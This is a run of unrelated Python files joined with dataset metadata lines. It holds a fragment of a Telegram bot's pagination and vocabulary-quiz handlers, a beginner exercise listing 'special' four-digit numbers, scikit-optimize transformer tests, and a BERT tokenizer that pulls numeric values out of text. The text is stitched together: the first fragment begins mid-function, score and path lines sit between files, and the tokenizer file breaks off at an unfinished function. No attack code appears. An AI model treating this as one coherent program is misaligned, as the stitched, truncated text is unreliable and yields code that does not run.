await query.answer(self.lang.get_page_text('PAGINATION', 'FIRST_REACHED', user_lang),
show_alert=True)
logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.')
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('next_'), state="*")
@self.analytics.callback_fsm_metric
async def pagination_next_callback_handler(query: types.CallbackQuery, state: FSMContext):
action = query.data[5:]
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
if 'curr_pagination_page' in data:
current_page = data['curr_pagination_page']
paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
query['from']['id'],
current_page=current_page)
if not paginator.is_last():
await query.message.edit_text(text=paginator.next_page(user_lang),
reply_markup=paginator.get_reply_markup(),
parse_mode=paginator.get_parse_mode())
data['curr_pagination_page'] = paginator.get_state_data()
else:
await query.answer(self.lang.get_page_text('PAGINATION', 'LAST_REACHED', user_lang),
show_alert=True)
logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.')
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('last_'), state="*")
@self.analytics.callback_fsm_metric
async def pagination_last_callback_handler(query: types.CallbackQuery, state: FSMContext):
action = query.data[5:]
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
if 'curr_pagination_page' in data:
current_page = data['curr_pagination_page']
paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
query['from']['id'],
current_page=current_page)
if not paginator.is_last():
await query.message.edit_text(text=paginator.last_page(user_lang),
reply_markup=paginator.get_reply_markup(),
parse_mode=paginator.get_parse_mode())
data['curr_pagination_page'] = paginator.get_state_data()
else:
await query.answer(self.lang.get_page_text('PAGINATION', 'LAST_REACHED', user_lang),
show_alert=True)
logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.')
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data == 'profile_referral_link')
@self.analytics.callback_metric
async def profile_referral_link_callback_handler(query: types.CallbackQuery):
user_lang = self.lang.parse_user_lang(query['from']['id'])
await query.message.answer(self.lang.get_user_referral_link_page(query['from']['id'], user_lang))
await query.message.edit_reply_markup(None)
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('mailings_'))
@self.analytics.callback_metric
async def admin_mailings_new_callback_handler(query: types.CallbackQuery):
user_lang = self.lang.parse_user_lang(query['from']['id'])
action = query['data'][9:]
if action == 'new':
await AdminMailingState.message.set()
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('MAILINGS', 'NEW', user_lang),
reply_markup=self.markup.get_cancel_markup())
elif action == 'schedule_list':
await query.answer()
# QUIZ CALLBACKS
@self.dp.callback_query_handler(lambda query: query.data == 'quiz_start', state="*")
@self.analytics.callback_fsm_metric
async def quiz_start_callback_handler(query: types.CallbackQuery, state: FSMContext):
await query.answer()
await query.message.delete()
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
from_lang = data['curr_pagination_page']['from_lang']
to_lang = data['curr_pagination_page']['to_lang']
quiz_data = self.db.get_user_quiz_data(query['from']['id'], from_lang, to_lang, 10)
await DictionaryQuizState.user_answers.set()
async with state.proxy() as data:
data['quiz_results'] = []
data['quiz_data'] = quiz_data
data['index'] = 1
question = f"{data['index']}/{len(data['quiz_data'])} " + \
self.lang.get_page_text('QUIZ', 'QUESTION', user_lang).format(quiz_data[0]['word'])
await self.bot.send_poll(chat_id=query['from']['id'],
question=question,
options=quiz_data[0]['options'],
correct_option_id=quiz_data[0]['options'].index(quiz_data[0]['answer']),
type='quiz',
reply_markup=self.markup.get_quiz_next_markup(user_lang))
@self.dp.callback_query_handler(state=DictionaryQuizState.user_answers)
@self.analytics.callback_fsm_metric
async def quiz_next_callback_handler(query: types.CallbackQuery, state: FSMContext):
user_lang = self.lang.parse_user_lang(query['from']['id'])
if query.message.poll.total_voter_count == 1:
await query.answer()
await query.message.delete()
async with state.proxy() as data:
curr_q_index = data['index']
quiz_result = {
'word': data['quiz_data'][curr_q_index - 1]['word'],
'selected_option': query.message.poll.options.index(
list(filter(lambda item: item.voter_count == 1,
query.message.poll.options))[0]),
'correct_option': query.message.poll.correct_option_id,
'options': list(map(lambda item: dict(item), query.message.poll.options))
}
data['quiz_results'].append(quiz_result)
if curr_q_index < len(data['quiz_data']) - 1:
data['index'] = curr_q_index + 1
question = f"{data['index']}/{len(data['quiz_data'])} "
else:
question = f"{len(data['quiz_data'])}/{len(data['quiz_data'])} "
await DictionaryQuizState.finish.set()
question += self.lang.get_page_text('QUIZ', 'QUESTION', user_lang).format(
data['quiz_data'][curr_q_index]['word'])
await self.bot.send_poll(chat_id=query['from']['id'],
question=question,
options=data['quiz_data'][curr_q_index]['options'],
correct_option_id=data['quiz_data'][curr_q_index]['options'].index(
data['quiz_data'][curr_q_index]['answer']),
type='quiz',
reply_markup=self.markup.get_quiz_next_markup(user_lang)
if curr_q_index != len(data['quiz_data']) - 1 else
self.markup.get_quiz_finish_markup(user_lang))
else:
await query.answer(self.lang.get_page_text('QUIZ', 'NON_SELECTED', user_lang),
show_alert=True)
@self.dp.callback_query_handler(state=DictionaryQuizState.finish)
@self.analytics.callback_fsm_metric
async def quiz_finish_callback_handler(query: types.CallbackQuery, state: FSMContext):
user_lang = self.lang.parse_user_lang(query['from']['id'])
if query.message.poll.total_voter_count == 1:
await query.answer()
await query.message.delete()
async with state.proxy() as data:
quiz_result = {
'word': data['quiz_data'][data['index']]['word'],
'selected_option': query.message.poll.options.index(
list(filter(lambda item: item.voter_count == 1,
query.message.poll.options))[0]),
'correct_option': query.message.poll.correct_option_id,
'options': list(map(lambda item: dict(item), query.message.poll.options))
}
data['quiz_results'].append(quiz_result)
await query.message.answer(self.lang.get_page_text('QUIZ', 'FINISH', user_lang))
await query.message.answer(self.lang.get_quiz_results_page(data['quiz_results'], user_lang),
parse_mode='Markdown')
last_pagination_page = data['curr_pagination_page']
await state.finish()
await DictionaryState.dictionary.set()
async with state.proxy() as data:
data['curr_pagination_page'] = last_pagination_page
else:
await query.answer(self.lang.get_page_text('QUIZ', 'NON_SELECTED', user_lang),
show_alert=True)
@self.dp.callback_query_handler(state=DictionarySearchWordState.search_query)
@self.analytics.callback_fsm_metric
async def search_word_actions_callback_handler(query: types.CallbackQuery, state: FSMContext):
user_lang = self.lang.parse_user_lang(query['from']['id'])
action = query.data[10:]
if action == 'add':
async with state.proxy() as data:
new_word_string = data['search_query']
new_word_translation = data['translation']
from_lang = data['curr_pagination_page']['from_lang']
to_lang = data['curr_pagination_page']['to_lang']
self.db.add_user_word(new_word_string, new_word_translation, query['from']['id'], from_lang,
to_lang)
await query.message.edit_text(self.lang.get_page_text('ADD_WORD', 'SUCCESSFUL_ADDED', user_lang))
await state.finish()
await asyncio.sleep(1)
await _send_dictionary_page(query.message, query['from']['id'], user_lang, from_lang, to_lang, state)
elif action == 'find_another':
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('FIND_WORD', 'WELCOME_TEXT', user_lang),
reply_markup=self.markup.get_cancel_markup())
@self.dp.callback_query_handler(state=DictionaryEditWordState.search_query)
@self.analytics.callback_metric
async def edit_word_actions_callback_handler(query: types.CallbackQuery):
user_lang = self.lang.parse_user_lang(query['from']['id'])
action = query.data[10:]
if action == 'string':
await DictionaryEditWordState.new_word_string.set()
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('EDIT_WORD', 'NEW_STRING', user_lang),
reply_markup=self.markup.get_cancel_markup())
elif action == 'translation':
await DictionaryEditWordState.new_word_translation.set()
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('EDIT_WORD', 'NEW_TRANSLATION', user_lang),
reply_markup=self.markup.get_cancel_markup())
| 2.09375 | 2 |
1-Python-Programming-Basics (Sep 2020)/Course-Exercises-and-Exams/06_Nested-Loops/02.Exercise-06-Special-Numbers.py | karolinanikolova/SoftUni-Software-Engineering | 0 | 5535 | # 6. Special Numbers
# Write a program that reads an integer N entered by the user and generates all possible "special"
# numbers from 1111 to 9999. For a number to be "special", it must satisfy the following condition:
# • N must be divisible by each of its digits without remainder.
# Example: for N = 16, 2418 is a special number:
# • 16 / 2 = 8 with no remainder
# • 16 / 4 = 4 with no remainder
# • 16 / 1 = 16 with no remainder
# • 16 / 8 = 2 with no remainder
N = int(input())
for number in range(1111, 9999 + 1):
is_number_special = True
number_as_string = str(number)
# Could also write for index, digit in enumerate(number_as_string): but since we don't need the index we don't need enumerate.
for digit in number_as_string:
if int(digit) == 0 or N % int(digit) != 0:
is_number_special = False
break
if is_number_special:
        print(number_as_string, end=' ')
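# Hedged alternative sketch (not part of the original exercise solution): the
# same digit check expressed as a reusable predicate.
def is_special(n, number):
    digits = [int(d) for d in str(number)]
    return all(d != 0 and n % d == 0 for d in digits)
# e.g. is_special(16, 2418) is True, matching the worked example in the header.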
| 3.953125 | 4 |
skopt/tests/test_transformers.py | sqbl/scikit-optimize | 0 | 5536 | import pytest
import numbers
import numpy as np
from numpy.testing import assert_raises
from numpy.testing import assert_array_equal
from numpy.testing import assert_equal
from numpy.testing import assert_raises_regex
from skopt.space import LogN, Normalize
@pytest.mark.fast_test
def test_logn2_integer():
transformer = LogN(2)
for X in range(2, 31):
X_orig = transformer.inverse_transform(transformer.transform(X))
assert_array_equal(int(np.round(X_orig)), X)
@pytest.mark.fast_test
def test_logn10_integer():
    transformer = LogN(10)
for X in range(2, 31):
X_orig = transformer.inverse_transform(transformer.transform(X))
assert_array_equal(int(np.round(X_orig)), X)
@pytest.mark.fast_test
def test_normalize_integer():
transformer = Normalize(1, 20, is_int=True)
assert transformer.transform(19.8) == 1.0
assert transformer.transform(20.2) == 1.0
assert transformer.transform(1.2) == 0.0
assert transformer.transform(0.9) == 0.0
assert_raises(ValueError, transformer.transform, 20.6)
assert_raises(ValueError, transformer.transform, 0.4)
assert transformer.inverse_transform(0.99) == 20
assert transformer.inverse_transform(0.01) == 1
assert_raises(ValueError, transformer.inverse_transform, 1. + 1e-8)
assert_raises(ValueError, transformer.transform, 0. - 1e-8)
@pytest.mark.fast_test
def test_normalize():
transformer = Normalize(1, 20, is_int=False)
assert transformer.transform(20.) == 1.0
assert transformer.transform(1.) == 0.0
assert_raises(ValueError, transformer.transform, 20. + 1e-7)
assert_raises(ValueError, transformer.transform, 1.0 - 1e-7)
assert_raises(ValueError, transformer.inverse_transform, 1. + 1e-8)
assert_raises(ValueError, transformer.transform, 0. - 1e-8)
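@pytest.mark.fast_test
def test_normalize_round_trip():
    # Hedged addition (not in the original suite): based on the behaviour
    # exercised above, transform/inverse_transform should round-trip for
    # in-range float values.
    transformer = Normalize(1, 20, is_int=False)
    for value in (1.0, 10.5, 20.0):
        round_trip = transformer.inverse_transform(transformer.transform(value))
        assert abs(round_trip - value) < 1e-8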
| 2.390625 | 2 |
tokenization_numerical.py | dspoka/mnm | 1 | 5537 | <gh_stars>1-10
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes."""
from __future__ import absolute_import, division, print_function, unicode_literals
import collections
import logging
import os
import sys
import unicodedata
from io import open
from transformers import PreTrainedTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {'vocab_file': 'vocab.txt'}
PRETRAINED_VOCAB_FILES_MAP = {
'vocab_file':
{
'bert-base-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt",
'bert-large-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased-vocab.txt",
'bert-base-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased-vocab.txt",
'bert-large-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased-vocab.txt",
'bert-base-multilingual-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-uncased-vocab.txt",
'bert-base-multilingual-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-cased-vocab.txt",
'bert-base-chinese': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-chinese-vocab.txt",
'bert-base-german-cased': "https://int-deepset-models-bert.s3.eu-central-1.amazonaws.com/pytorch/bert-base-german-cased-vocab.txt",
'bert-large-uncased-whole-word-masking': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased-whole-word-masking-vocab.txt",
'bert-large-cased-whole-word-masking': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased-whole-word-masking-vocab.txt",
'bert-large-uncased-whole-word-masking-finetuned-squad': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased-whole-word-masking-finetuned-squad-vocab.txt",
'bert-large-cased-whole-word-masking-finetuned-squad': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased-whole-word-masking-finetuned-squad-vocab.txt",
'bert-base-cased-finetuned-mrpc': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased-finetuned-mrpc-vocab.txt",
}
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
'bert-base-uncased': 512,
'bert-large-uncased': 512,
'bert-base-cased': 512,
'bert-large-cased': 512,
'bert-base-multilingual-uncased': 512,
'bert-base-multilingual-cased': 512,
'bert-base-chinese': 512,
'bert-base-german-cased': 512,
'bert-large-uncased-whole-word-masking': 512,
'bert-large-cased-whole-word-masking': 512,
'bert-large-uncased-whole-word-masking-finetuned-squad': 512,
'bert-large-cased-whole-word-masking-finetuned-squad': 512,
'bert-base-cased-finetuned-mrpc': 512,
}
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
with open(vocab_file, "r", encoding="utf-8") as reader:
tokens = reader.readlines()
for index, token in enumerate(tokens):
token = token.rstrip('\n')
vocab[token] = index
return vocab
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
class BertNumericalTokenizer(PreTrainedTokenizer):
r"""
Constructs a BertTokenizer.
:class:`~pytorch_transformers.BertTokenizer` runs end-to-end tokenization: punctuation splitting + wordpiece
Args:
vocab_file: Path to a one-wordpiece-per-line vocabulary file
do_lower_case: Whether to lower case the input. Only has an effect when do_wordpiece_only=False
do_basic_tokenize: Whether to do basic tokenization before wordpiece.
max_len: An artificial maximum length to truncate tokenized sequences to; Effective maximum length is always the
minimum of this value (if specified) and the underlying BERT model's sequence length.
never_split: List of tokens which will never be split during tokenization. Only has an effect when
do_wordpiece_only=False
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(self, vocab_file, do_lower_case=True, do_basic_tokenize=True, never_split=None,
unk_token="[UNK]", sep_token="[SEP]", pad_token="[PAD]", cls_token="[CLS]",
mask_token="[MASK]", tokenize_chinese_chars=True, **kwargs):
"""Constructs a BertNumericalTokenizer.
Args:
**vocab_file**: Path to a one-wordpiece-per-line vocabulary file
**do_lower_case**: (`optional`) boolean (default True)
Whether to lower case the input
Only has an effect when do_basic_tokenize=True
**do_basic_tokenize**: (`optional`) boolean (default True)
Whether to do basic tokenization before wordpiece.
**never_split**: (`optional`) list of string
List of tokens which will never be split during tokenization.
Only has an effect when do_basic_tokenize=True
**tokenize_chinese_chars**: (`optional`) boolean (default True)
Whether to tokenize Chinese characters.
This should likely be deactivated for Japanese:
see: https://github.com/huggingface/pytorch-pretrained-BERT/issues/328
"""
super(BertNumericalTokenizer, self).__init__(unk_token=unk_token, sep_token=sep_token,
pad_token=pad_token, cls_token=cls_token,
mask_token=mask_token, **kwargs)
if not os.path.isfile(vocab_file):
raise ValueError(
"Can't find a vocabulary file at path '{}'. To load the vocabulary from a Google pretrained "
"model use `tokenizer = BertNumericalTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`".format(vocab_file))
self.vocab = load_vocab(vocab_file)
self.unk_num = '[UNK_NUM]'
self.default_value = 1.0
never_split = ['[UNK_NUM]']
self.ids_to_tokens = collections.OrderedDict(
[(ids, tok) for tok, ids in self.vocab.items()])
self.do_basic_tokenize = do_basic_tokenize
self.numerical_tokenizer = NumericalTokenizer(do_lower_case=do_lower_case,
never_split=never_split)
if do_basic_tokenize:
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case,
never_split=never_split,
tokenize_chinese_chars=tokenize_chinese_chars)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab, unk_token=self.unk_token, unk_num=self.unk_num)
@property
def vocab_size(self):
return len(self.vocab)
def _tokenize(self, text, get_values=False, get_sigfigs=None, get_numeric_masks=None):
split_tokens = []
numeric_values = []
numeric_masks = []
split_sigfigs = []
i = 0
for (token, sigfig) in self.numerical_tokenizer.tokenize(text, never_split=self.all_special_tokens):
for (sub_token, numeric_value, numeric_mask) in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
numeric_values.append(numeric_value)
numeric_masks.append(numeric_mask)
if numeric_value != self.default_value:
split_sigfigs.append(sigfig)
else:
split_sigfigs.append('-1')
                if numeric_value != self.default_value and sub_token != self.unk_num:
                    # A numeric value should only ever be attached to the special
                    # unk_num token; anything else indicates a tokenization bug.
                    raise ValueError(
                        "numeric value %r attached to non-numeric token %r" % (numeric_value, sub_token))
if get_numeric_masks:
return numeric_masks
if get_values:
return numeric_values
assert len(split_tokens) == len(numeric_values) == len(split_sigfigs)
if get_sigfigs:
return split_sigfigs
return split_tokens
def _convert_token_to_id(self, token):
""" Converts a token (str/unicode) in an id using the vocab. """
return self.vocab.get(token, self.vocab.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (string/unicode) using the vocab."""
return self.ids_to_tokens.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens):
""" Converts a sequence of tokens (string) in a single string. """
out_string = ' '.join(tokens).replace(' ##', '').strip()
return out_string
def save_vocabulary(self, vocab_path):
"""Save the tokenizer vocabulary to a directory or file."""
index = 0
if os.path.isdir(vocab_path):
vocab_file = os.path.join(vocab_path, VOCAB_FILES_NAMES['vocab_file'])
with open(vocab_file, "w", encoding="utf-8") as writer:
for token, token_index in sorted(self.vocab.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning("Saving vocabulary to {}: vocabulary indices are not consecutive."
" Please check that the vocabulary is not corrupted!".format(vocab_file))
index = token_index
writer.write(token + u'\n')
index += 1
return (vocab_file,)
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, *inputs, **kwargs):
""" Instantiate a BertNumericalTokenizer from pre-trained vocabulary files.
"""
if pretrained_model_name_or_path in PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES:
if '-cased' in pretrained_model_name_or_path and kwargs.get('do_lower_case', True):
logger.warning("The pre-trained model you are loading is a cased model but you have not set "
"`do_lower_case` to False. We are setting `do_lower_case=False` for you but "
"you may want to check this behavior.")
kwargs['do_lower_case'] = False
elif '-cased' not in pretrained_model_name_or_path and not kwargs.get('do_lower_case', True):
logger.warning("The pre-trained model you are loading is an uncased model but you have set "
"`do_lower_case` to False. We are setting `do_lower_case=True` for you "
"but you may want to check this behavior.")
kwargs['do_lower_case'] = True
return super(BertNumericalTokenizer, cls)._from_pretrained(pretrained_model_name_or_path, *inputs, **kwargs)
class NumericalTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True, never_split=None):
""" Constructs a BasicTokenizer.
Args:
**do_lower_case**: Whether to lower case the input.
**never_split**: (`optional`) list of str
Kept for backward compatibility purposes.
Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`)
List of token not to split.
"""
if never_split is None:
never_split = []
self.do_lower_case = do_lower_case
self.never_split = never_split
def tokenize(self, text, never_split=None):
""" Basic Numerical Tokenization of a piece of text.
Args:
**never_split**: (`optional`) list of str
Kept for backward compatibility purposes.
Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`)
List of token not to split.
"""
# digits = '0123456789'
# punctuation = '$%'
# text = self._clean_text(text)
# orig_tokens = whitespace_tokenize(text)
split_tokens, split_sigfigs = normalize_numbers_in_sent(text)
output_tokens = whitespace_tokenize(" ".join(split_tokens))
output_sigfigs = whitespace_tokenize(" ".join(split_sigfigs))
return zip(output_tokens,split_sigfigs)
# return output_tokens,
# _numbers = '[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?'
# fraction_pattern = re.compile(_fraction)
# number_pattern = re.compile(_numbers)
class BasicTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True, never_split=None, tokenize_chinese_chars=True):
""" Constructs a BasicTokenizer.
Args:
**do_lower_case**: Whether to lower case the input.
**never_split**: (`optional`) list of str
Kept for backward compatibility purposes.
Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`)
List of token not to split.
**tokenize_chinese_chars**: (`optional`) boolean (default True)
Whether to tokenize Chinese characters.
This should likely be deactivated for Japanese:
see: https://github.com/huggingface/pytorch-pretrained-BERT/issues/328
"""
if never_split is None:
never_split = []
self.do_lower_case = do_lower_case
self.never_split = never_split
self.tokenize_chinese_chars = tokenize_chinese_chars
def tokenize(self, text, never_split=None):
""" Basic Tokenization of a piece of text.
Split on "white spaces" only, for sub-word tokenization, see WordPieceTokenizer.
Args:
**never_split**: (`optional`) list of str
Kept for backward compatibility purposes.
Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`)
List of token not to split.
"""
never_split = self.never_split + (never_split if never_split is not None else [])
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
if self.tokenize_chinese_chars:
text = self._tokenize_chinese_chars(text)
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case and token not in never_split:
token = token.lower()
token = self._run_strip_accents(token)
split_tokens.extend(self._run_split_on_punc(token))
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text, never_split=None):
"""Splits punctuation on a piece of text."""
if never_split is not None and text in never_split:
return [text]
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
#dont split on periods if number is before it
# if _is_punctuation(char) and not chars[i-1].isdigit() or _is_punctuation(char) and i == 0:
if _is_punctuation(char):
if i == 0:
do_split = True
elif i == len(chars)-1:
do_split = True
else:
if not chars[i-1].isdigit():
do_split = True
else:
do_split = False
else:
do_split = False
if do_split:
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer(object):
"""Runs WordPiece tokenization."""
def __init__(self, vocab, unk_token, unk_num, max_input_chars_per_word=100):
self.vocab = vocab
self.unk_token = unk_token
self.unk_num = unk_num
self.default_value = 1.0
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
"""Tokenizes a piece of text into its word pieces.
This uses a greedy longest-match-first algorithm to perform tokenization
using the given vocabulary.
For example:
input = "unaffable"
output = ["un", "##aff", "##able"]
Args:
text: A single token or whitespace separated tokens. This should have
already been passed through `BasicTokenizer`.
Returns:
A list of wordpiece tokens.
"""
output_tokens = []
numeric_values = []
numeric_mask = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
output_tokens.append(self.unk_token)
numeric_values.append(self.default_value)
numeric_mask.append(0)
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
try:
if token not in ['infinity', 'inf', 'nan']:
numeric_value = float(token)
is_number = True
else:
is_number = False
                except ValueError:
                    is_number = False
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr
if substr in self.vocab and is_number == False:
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_number:
#ACTUAL NUMBER HERE
output_tokens.append(self.unk_num)
numeric_values.append(numeric_value)
numeric_mask.append(1)
elif is_bad:
output_tokens.append(self.unk_token)
numeric_values.append(self.default_value)#-9e9
numeric_mask.append(0)
else:
numeric_values.extend([self.default_value]*len(sub_tokens))#-9e9
numeric_mask.extend([0]*len(sub_tokens))
output_tokens.extend(sub_tokens)
assert len(numeric_values) == len(output_tokens) == len(numeric_mask)
return zip(output_tokens, numeric_values, numeric_mask)
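# Hedged illustration (assumption, not from the original module): with a vocab
# containing "costs" and "dollars", WordpieceTokenizer would be expected to turn
# "costs 12.5 dollars" into triples roughly like
#     ("costs", 1.0, 0), ("[UNK_NUM]", 12.5, 1), ("dollars", 1.0, 0)
# i.e. literal numbers are replaced by unk_num, their value is carried in
# numeric_values and flagged in numeric_mask.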
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
# if cat.startswith("P") and cp != 46:
if cat.startswith("P"):
return True
return False
################
#
Small = {
'zero': 0.0,
'one': 1.0,
'two': 2.0,
'three': 3.0,
'four': 4.0,
'five': 5.0,
'six': 6.0,
'seven': 7.0,
'eight': 8.0,
'nine': 9.0,
'ten': 10.0,
'eleven': 11.0,
'twelve': 12.0,
'thirteen': 13.0,
'fourteen': 14.0,
'fifteen': 15.0,
'sixteen': 16.0,
'seventeen': 17.0,
'eighteen': 18.0,
'nineteen': 19.0,
'twenty': 20.0,
'thirty': 30.0,
'forty': 40.0,
'fifty': 50.0,
'sixty': 60.0,
'seventy': 70.0,
'eighty': 80.0,
'ninety': 90.0
}
Magnitude = {
'thousand': 1000.0,
'million': 1000000.0,
'billion': 1000000000.0,
'trillion': 1000000000000.0,
'quadrillion': 1000000000000000.0,
'quintillion': 1000000000000000000.0,
'sextillion': 1000000000000000000000.0,
'septillion': 1000000000000000000000000.0,
'octillion': 1000000000000000000000000000.0,
'nonillion': 1000000000000000000000000000000.0,
}
class NumberException(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
def text2num(sent):
if type(sent) is str:
words = [word.lower() for word in sent.strip().split()]
elif type(sent) is list:
words = [word.lower() for word in sent]
# n = 0
# g = 0
mantissa = 0
# number = 0.0
for i, word in enumerate(words):
if i == 0:
mantissa = Small.get(word, None)
if mantissa is None:
try:
mantissa = float(word)
except ValueError:
raise NumberException("First must be a number of sorts")
elif i != 0:
magnitude = Magnitude.get(word, None)
if magnitude is not None:
mantissa = mantissa*magnitude
else: # non-number word
raise NumberException("Unknown number: "+word)
return mantissa
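def _text2num_examples():
    # Hedged illustration (addition, not in the original module): expected
    # behaviour of text2num given the Small/Magnitude tables above.
    assert text2num("three thousand") == 3000.0
    assert text2num(["24", "million"]) == 24000000.0
    try:
        text2num("hello world")
    except NumberException:
        pass  # a non-numeric leading word raises NumberException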
def generate_ngrams(sentence, n):
return zip(*[sentence[i:] for i in range(n)])
def check_int(s):
